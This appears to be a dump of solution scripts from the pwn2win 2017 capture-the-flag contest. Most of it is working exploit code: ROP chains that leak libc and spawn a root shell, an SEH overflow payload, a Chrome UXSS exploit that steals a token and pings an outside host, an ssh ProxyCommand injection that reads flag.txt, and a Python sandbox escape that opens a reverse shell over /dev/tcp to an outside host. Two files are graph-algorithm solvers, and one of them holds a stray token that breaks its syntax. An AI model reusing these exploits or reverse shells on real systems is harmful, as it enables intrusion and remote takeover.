pwn2win 2017 solution dump

0_wronguser.py

from pwnlib.tools import * # https://github.com/niklasb/ctf-tools
connect()
ru('name?\n')
pop_rdi = 0x004007f3
pop_rsi_r15=0x4007f1
puts=0x400570
fflush=0x4005d0
fgets=0x4005b0

rbp = 0x600ba0
rop = ''
rop += p64(pop_rdi)
rop += p64(0x600b98)
rop += p64(puts)
rop += p64(pop_rdi)
rop += p64(0)
rop += p64(fflush)
rop += p64(0x400743)
assert not '\n' in rop

sendln('a'*32+p64(rbp)+rop)
libc = u64(readln()[-6:]+'\0\0')-0x7ffff7a7aad0+0x00007ffff7a0d000
info('libc @ %p', libc)

stage2 = ''
stage2 += p64(0x424242424242)
stage2 += p64(0x400780)
stage2 += 'F'*16
stage2 += p64(0x600ba0)

stage2 += p64(libc+0x21102) # pop rdi
stage2 += p64(1337)
stage2 += p64(libc+0x000202e8) # pop rsi
stage2 += p64(1337)
stage2 += p64(libc+0x0001b92) # pop rdx
stage2 += p64(1337)
stage2 +=p64(libc+0xcd570) # setresuid
stage2 += p64(libc+0x21102) # pop rdi
stage2 += p64(libc+0x18cd17) # "/bin/sh"
stage2 += p64(libc+0x45390) # system

stage2 += 'G'*(0x400-len(stage2))
assert not '\n' in stage2
sendln(stage2)
interact()

1_warehouse.py

from pwnlib.tools import * # https://github.com/niklasb/ctf-tools

# Run until you get a shell. Should work in 1/16 tries (4 bits are guessed)
connect()
ru('Exit with ".".\n')

pop3=0x080486ad
store=0x80484FB
got=0x8049900
plt=0x80483A0
popebp=0x08048510
nl=0x80486E1

def write(addr, val):
    return [store, pop3, addr, 0, val]

rop = []
rop += write(got-2, 0xd1404343)  # puts
rop += [plt, popebp, got]
rop += write(got-2, 0xb3304343)  # fflush
rop += [plt, popebp, 0]
rop += write(got-2, 0xc8904343)  # gets
rop += [plt, popebp, 0x80498c8]
rop += [plt, popebp, got]
rop += [plt, popebp, 0x80498c8]

for i, x in enumerate(rop):
    if x >= 2**31:
        x-=2**32
    send('%d\n%d\n'%(72+i, x))
sendln('.')

libc = u32(readn(4))-0xf7e7d140+0xf7e1e000
if libc&0xfff:
    exit(1)
info('libc %p', libc)

system = libc+0x3a940
info('system %p', system)
sendln('/bin/sh;')
raw_input()
sendln(p32(system))

enjoy()

2_seh.py

import struct

payload = 'A'*352
payload += struct.pack("<I",0x8011798)
payload += 'B'*(0x200-len(payload))
sys.stdout.write(payload)
# python2 seh.py | nc host port

3_netscape.html

<!DOCTYPE html>

<!-- UXSS 1day in Chrome:

  https://bugs.chromium.org/p/chromium/issues/detail?id=668552

-->

<base href="javascript:top.f();//"></base>
<object name="privateScriptController"></object>
<object data="#"></object>
<script>
if (location.protocol == 'file:') {
  throw alert('HTTP server is required.');
}

function f() {
  document.getElementsByName('privateScriptController')[0].remove();
  frames[0].document.documentElement.appendChild(c);
}

var i = document.documentElement.appendChild(document.createElement('iframe'));
var d = i.contentDocument;
i.remove();

var c = d.documentElement.appendChild(d.createElement('div'));
var m = c.appendChild(d.createElement('marquee'));
var i0 = c.appendChild(d.createElement('iframe'));
var i1 = c.appendChild(d.createElement('iframe'));

m.setAttribute('class', 'a');
document.adoptNode(c);

var code= (
  'var x=new XMLHttpRequest();'+
  'x.open("GET","http://careers.butcher.team/analysis/curriculums",false);'+
  'x.send();'+

  'var token=x.responseText.split("\'accept\',\'")[1].split("\'")[0];'+

  'var y=new XMLHttpRequest();'+
  'y.open("POST","http://careers.butcher.team/analysis/accept",false);'+
  'y.setRequestHeader("Content-type", "application/json");'+
  'y.send(JSON.stringify({token:token}));'+

  'var z=new XMLHttpRequest();'+
  'z.open("GET","http://dtun.de/done/",false);'+
  'z.send();');

var payload = '';
for (var i = 0; i < code.length; ++i) {
  if (i>0) payload += ',';
  payload += code.charCodeAt(i);
}
console.log(payload);

i1.onload = function() {
  try {
    i1.contentDocument;
  } catch(e) {
    i1.onload = null;
    i1.src = 'javascript:eval(String.fromCharCode('+payload+'))';
    document.querySelector('base').remove();
    document.documentElement.appendChild(document.createElement('iframe')).src = 's.svg';
  }
}

i1.src = 'http://careers.butcher.team/analysis/curriculums';
</script>

<!-- This one is to delay the load. the server must listen, but not give a response! -->
<img src="http://dtun.de:4444/"/>

<!-- Also serve /s.svg:

<svg xmlns="http://www.w3.org/2000/svg">
<iframe xmlns="http://www.w3.org/1999/xhtml"></iframe>
<script>
frames[0].onunload = function() {
  frames[0].frameElement.appendChild(top.c);
}
</script>
<element a="1" a="2" />
</svg>

-->

4_butcher.txt

4
ssh://-oProxyCommand=sh<&2 /a
ls -alih>&2
cat flag.txt>&2

5_tokens.py

from pwnlib.tools import * #https://github.com/niklasb/ctf-tools
connect()
sendln(r'\D')
sendln(r'Revoke')
sendln(r'Op\en')
sendln(r'gen eval(Option())')
sendln(r'''raw_input([x for x in ().__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('/bin/bash -c "sh >/dev/tcp/kitctf.de/5555 <&1 2>&1"'))''')
interact()

6_resistance.sage

from sage.all import matrix, Integer, Rational
from scipy import linalg
from pwnlib.tools import *  # https://github.com/niklasb/ctf-tools
import ssl

s=ssl.wrap_socket(connect())

while True:
    queries = []
    edges = {}
    n=0
    while True:
        ln = map(int,readln(s).split())
        if not ln:
            break
        if len(ln)==2:
            queries.append(ln)
        else:
            assert not queries
            x,y=min(ln[:2]),max(ln[:2])
            if x == y:
                continue
            n=max(n,x)
            n=max(n,y)
            edges.setdefault((x,y),[])
            edges[x,y].append(ln[2])
    print "DONE READING %d %d %d" % (n, len(edges), len(queries))
    L = [[0]*n for _ in range(n)]
    seen = set()
    for (x,y), ws in edges.items():
        assert x != y
        assert (x,y) not in seen and (y,x) not in seen
        seen.add((x,y))
        w = 1./sum(1./w for w in ws)
        x-=1
        y-=1
        L[x][y] = L[y][x] = -1.0/w
    for i in range(n):
        L[i][i] = -sum(L[i])
    L = matrix(L)
    H = matrix(linalg.pinv(L))
    for x, y in queries:
        x-=1
        y-=1
        r=H[x,x]+H[y,y]-H[x,y]-H[y,x]
        # print x, y, '%.3f'%r
        sendln(s,'%.03f'%r)
interact()

7_securepath.py

from collections import defaultdict
import ssl
from pwnlib.tools import *

s=ssl.wrap_socket(connect())
# s=connect()

def solve(n, edges, queries):
    par = {}
    childs = defaultdict(list)

    def find(x):
        if par[x]==x:
            return x
        p=find(par[x])
        par[x]=p
        return p

    def merge(x, y):
        assert x != y and par[x]==x and par[y]==y
        par[x]=y
        childs[y].append(x)

    def dfs(x):
        yield x
        for y in childs[x]:
            for a in dfs(y):
                yield a

    edges=sorted(edges,key=lambda (x,y,w): w, reverse=True)

    ans = [[-1]*n for _ in range(n)]

    for i in range(n):
        par[i]=i
    seen=set()
    for x, y, w in edges:
        # print x, y, w
        R=(min(x,y),max(x,y))
        assert R not in seen
        seen.add(R)
        x=find(x)
        y=find(y)
        if x==y:
            continue
        A = list(dfs(x))
        B = list(dfs(y))
        for a in A:
            for b in B:
                assert ans[a][b]==-1
                ans[a][b]=ans[b][a]=w
        merge(x, y)
    res = []
    for x, y in queries:
        assert x!=y
        assert ans[x][y]!=-1
        res.append(ans[x][y])
    return res

while True:
    queries = []
    edges = []

    n=0
    while True:
        ln = readln(s)
        ln = map(int,ln.split())
        if not ln:
            break
        ln[0]-=1
        ln[1]-=1
        assert ln[0]!=ln[1]
        if len(ln)==2:send
            queries.append(ln)
        else:
            assert not queries
            n=max(n,ln[0]+1,ln[1]+1)
            # print ln
            edges.append(ln)

    print "DONE READING %d %d %d" % (n, len(edges), len(queries))
    res = solve(n, edges, queries)

    send(s,'\n'.join('%d.0'%a for a in res))
interact()